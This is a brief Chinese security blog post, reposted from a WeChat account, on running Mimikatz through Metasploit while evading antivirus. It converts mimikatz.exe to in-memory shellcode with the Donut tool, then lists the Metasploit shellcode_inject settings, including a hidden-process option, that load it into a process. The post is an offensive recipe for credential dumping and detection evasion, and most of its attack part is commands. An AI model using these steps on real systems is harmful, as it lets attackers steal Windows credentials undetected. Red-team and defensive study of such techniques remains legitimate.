MSF加载Minikatz免杀

admin 2023年10月5日01:04:12评论75 views字数 446阅读1分29秒阅读模式

MSF加载Minikatz免杀

在人生的道路上,每个人都是孤独的旅客。
--季羡林

Donut 是一个与位置无关的工具,支持在内存中执行 VBScript、JScript、EXE、DLL 文件和 dotNET 程序集。Donut 创建的模块可以从 HTTP 服务器暂存,也可以直接嵌入到加载器本身中。可以选择使用 Chaskey 块密码和随机生成的 128 位密钥对模块进行加密。在内存中加载并执行文件后,将擦除原始引用以阻止内存扫描程序。
提取mimikatz.bin

./donut -f mimikatz.exe -o mimikatz.bin

MSF加载Minikatz免杀

设置MSF

  • use post/windows/manage/shellcode_injectset SHELLCODE /root/tools/noterce/mimikatz.binset CHANNELIZED trueset INTERACTIVE trueset HIDDEN true

    MSF加载Minikatz免杀

    https://github.com/TheWover/donut

    原文始发于微信公众号(Enginge):MSF加载Minikatz免杀

    • 左青龙
    • 微信扫一扫
    • weinxin
    • 右白虎
    • 微信扫一扫
    • weinxin
    admin
    • 本文由 发表于 2023年10月5日01:04:12
    • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                     MSF加载Minikatz免杀http://cn-sec.com/archives/2086104.html

    发表评论

    匿名网友 填写信息